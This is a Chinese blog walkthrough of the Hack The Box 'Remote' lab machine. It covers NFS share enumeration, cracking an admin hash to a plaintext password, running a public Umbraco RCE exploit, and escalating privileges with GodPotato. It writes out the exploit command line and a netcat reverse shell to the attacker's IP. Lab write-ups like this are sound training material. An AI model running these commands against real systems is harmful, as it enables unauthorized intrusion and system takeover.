当前位置: 首页 > news >正文

CPTS Remote 复现

nmap -A -T4 -p- -n -Pn 10.10.10.180

在这里插入图片描述
111端口NFS
RPCBind + NFS,如果你发现服务 NFS,那么你可能能够列出和下载(也许还可以上传)文件:
NFS 是一个为 客户端/服务器 设计的系统,使用户能够像访问本地目录中的文件一样,无缝地通过网络访问文件。
默认端口:2049/TCP/UDP(版本 4 除外,只需要 TCP 或 UDP)。

这可以用来 获取 NFSv3 服务器的信息,例如 导出 列表、谁被 允许访问 这些导出,以及哪些客户端已连接(如果客户端在未告知服务器的情况下断开连接,这可能不

showmount -e 10.10.10.180

在这里插入图片描述
挂载

mount -t nfs 10.10.10.180:/site_backups ./site_backups -o nolock

在这里插入图片描述
好像是网站备份文件
枚举网站
在这里插入图片描述
写着Umbraco Forms是渲染此表单所必需的。安装非常简单,您只需前往后台的Umbraco Forms部分,点击安装即可! 😃

来到了一个登陆页面
在这里插入图片描述

在这里插入图片描述
发现hash
adminadmin@htb.localb 8be16afba8c314ad33d812f22a04991b90e2aaa
尝试破解
在这里插入图片描述

john  --wordlist=/usr/share/wordlists/rockyou.txt ./hash

在这里插入图片描述
拿到凭据
admin@htb.local : baconandcheese
成功登陆后台
在这里插入图片描述
在这里插入图片描述
版本为7.12.4,存在RCE命令执行
payload:
https://github.com/Jonoans/Umbraco-RCE

python3 exploit.py -u admin@htb.local -p baconandcheese -i 10.10.14.25 -w http://10.10.10.180

在这里插入图片描述
成功拿到shell

然后

whoami /all

在这里插入图片描述
发现SeImpersonatePrivilege,
上传nc和GodPotato

./GodPotato-NET4.exe -cmd "cmd /c C:\Users\Public\nc.exe 10.10.14.25 8080 -e cmd.exe"

在这里插入图片描述
成功提权

http://www.lryc.cn/news/613499.html

相关文章:

  • react-router/react-router-dom
  • 深度学习中主要库的使用:(一)pandas,读取 excel 文件,支持主流的 .xlsx/.xls 格式
  • 房产证识别在房产行业的技术实现及应用原理
  • 超高车辆如何影响城市立交隧道安全?预警系统如何应对?
  • 网络基础概念
  • 基于Qt的Live2D模型显示以及控制
  • ora-01658 无法为表空间 users中的段创建initial区
  • RocketMQ架构解析
  • 遥感卫星领域的AI应用
  • Day03 学习git
  • LWIP网络接口管理
  • [airplay2] airplay2简略介绍
  • 二分查找算法,并分析其时间、空间复杂度
  • IIS7.5下的https无法绑定主机头,显示灰色如何处理?
  • 前后端加密传数据实现方案
  • [ java SE ] 多人聊天窗口1.0
  • 强光干扰下裂缝漏检率↓82%!陌讯轻量化模型在道路巡检的落地实践
  • redis--黑马点评--用户签到模块详解
  • JAVA,Maven继承
  • 力扣经典算法篇-46-阶乘后的零(正向步长遍历,逆向步长遍历)
  • Linux Shell为文件添加BOM并自动转换为unix格式
  • 数据分析——Pandas库
  • 什么是 TDengine IDMP?
  • 机试备考笔记 7/31
  • 学习设计模式《二十一》——装饰模式
  • 人生后半场:从广度到深度的精进之路
  • 设计模式中的行为模式
  • 多线程 future.get()的线程阻塞是什么意思?
  • tcpdump问题记录
  • 【多重BFS】Monsters